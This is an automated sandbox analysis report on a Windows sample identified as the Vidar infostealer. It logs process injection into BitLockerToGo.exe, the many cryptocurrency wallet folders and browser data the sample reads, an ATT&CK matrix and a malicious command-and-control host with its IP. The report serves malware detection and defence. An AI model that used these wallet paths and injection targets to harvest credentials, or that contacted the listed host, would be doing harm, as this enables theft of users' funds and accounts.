Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: Google Drive.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.7.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: dwpk5JGAxF.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x3eae00
Source: dwpk5JGAxF.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x420600

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\Desktop\dwpk5JGAxF.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dwpk5JGAxF.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: chrome.exe, 00000007.00000002.2026397859.000051E002CEC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: Web Data.12.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Web Data.12.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: Web Data.12.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: Web Data.12.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Web Data.12.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: Web Data.12.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Web Data.12.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Web Data.12.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: Web Data.12.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: chrome.exe, 00000007.00000002.2014572512.000002C830EC7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_`
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msedge.exe, 0000000B.00000003.2057807743.0000734800310000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware20,1(
Source: Web Data.12.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: Web Data.12.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Web Data.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.00000000029E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: Web Data.12.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: chrome.exe, 00000007.00000003.1973281918.000051E00315C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=ca7c621f-7ad1-4116-a5ff-0d79f3b22ad4
Source: dwpk5JGAxF.exe, 00000000.00000002.1820535354.0000000001908000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2013853318.000002C82D388000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000B.00000002.2145943779.000001D3EC443000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: Web Data.12.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Web Data.12.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Web Data.12.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: chrome.exe, 00000007.00000002.2024934993.000051E0029A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Virtual USB Mouse(
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: Web Data.12.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Web Data.12.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: Web Data.12.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Web Data.12.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Web Data.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Web Data.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: chrome.exe, 00000007.00000003.1973281918.000051E00315C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=ca7c621f-7ad1-4116-a5ff-0d79f3b22ad4Q
Source: Web Data.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Web Data.12.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	API call chain: ExitProcess graph end node	graph_3-12163
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	API call chain: ExitProcess graph end node	graph_3-12257
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	API call chain: ExitProcess graph end node	graph_3-11869

Source: C:\Users\user\Desktop\dwpk5JGAxF.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 26E6008	Jump to behavior
Source: C:\Users\user\Desktop\dwpk5JGAxF.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\dwpk5JGAxF.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\dwpk5JGAxF.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 419000	Jump to behavior
Source: C:\Users\user\Desktop\dwpk5JGAxF.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41D000	Jump to behavior
Source: C:\Users\user\Desktop\dwpk5JGAxF.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41F000	Jump to behavior
Source: C:\Users\user\Desktop\dwpk5JGAxF.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 420000	Jump to behavior
Source: C:\Users\user\Desktop\dwpk5JGAxF.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 421000	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\dwpk5JGAxF.exe	Queries volume information: C:\Users\user\Desktop\dwpk5JGAxF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dwpk5JGAxF.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dwpk5JGAxF.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 3.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dwpk5JGAxF.exe.a720000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dwpk5JGAxF.exe.a740000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dwpk5JGAxF.exe.a680000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dwpk5JGAxF.exe.a700000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dwpk5JGAxF.exe.a6e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1823395931.000000000A700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1823395931.000000000A680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1823395931.000000000A6E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1823395931.000000000A740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1893504632.0000000002A57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2314231363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1823395931.000000000A720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dwpk5JGAxF.exe PID: 764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 5448, type: MEMORYSTR

Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Exodus Web3 Wallet
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MultiDoge
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: BitLockerToGo.exe, 00000003.00000002.2314637290.0000000002A96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Create Account	1 Extra Window Memory Injection	1 Obfuscated Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	411 Process Injection	1 DLL Side-Loading	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	1 Extra Window Memory Injection	NTDS	35 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 Query Registry	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Virtualization/Sandbox Evasion	Cached Domain Credentials	11 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	411 Process Injection	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	12 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Source	Detection	Scanner	Label	Link
dwpk5JGAxF.exe	19%	Virustotal		Browse
dwpk5JGAxF.exe	45%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
http://anglebug.com/6755/	0%	Avira URL Cloud	safe
https://anglebug.com/7369(	0%	Avira URL Cloud	safe
http://anglebug.com/5421I	0%	Avira URL Cloud	safe
https://fua.4t.com%	0%	Avira URL Cloud	safe
http://anglebug.com/34986	0%	Avira URL Cloud	safe
https://permanently-removed.invalid/oauth2/v4/tokenHs	0%	Avira URL Cloud	safe
http://anglebug.com/4551P	0%	Avira URL Cloud	safe
https://anglebug.com/7246up.	0%	Avira URL Cloud	safe
http://anglebug.com/5881.	0%	Avira URL Cloud	safe
https://fua.4t.com/	100%	Avira URL Cloud	malware
https://fua.4t.comI	0%	Avira URL Cloud	safe
https://anglebug.com/7369g	0%	Avira URL Cloud	safe

Name	IP	Active	Malicious	Reputation
fua.4t.com	94.130.190.206	true	true	unknown
chrome.cloudflare-dns.com	172.64.41.3	true	false	high
plus.l.google.com	172.217.16.142	true	false	high
a416.dscd.akamai.net	2.22.242.105	true	false	high
t.me	149.154.167.99	true	false	high
a-0003.a-msedge.net	204.79.197.203	true	false	high
c-msn-pme.trafficmanager.net	13.74.129.1	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
ax-0001.ax-msedge.net	150.171.28.10	true	false	high
play.google.com	142.250.185.78	true	false	high
sb.scorecardresearch.com	18.244.18.122	true	false	high
www.google.com	142.250.185.228	true	false	high
e28578.d.akamaiedge.net	2.22.242.41	true	false	high
googlehosted.l.googleusercontent.com	216.58.206.33	true	false	high
assets.msn.com	unknown	unknown	false	high
c.msn.com	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high
api.msn.com	unknown	unknown	false	high

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report dwpk5JGAxF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

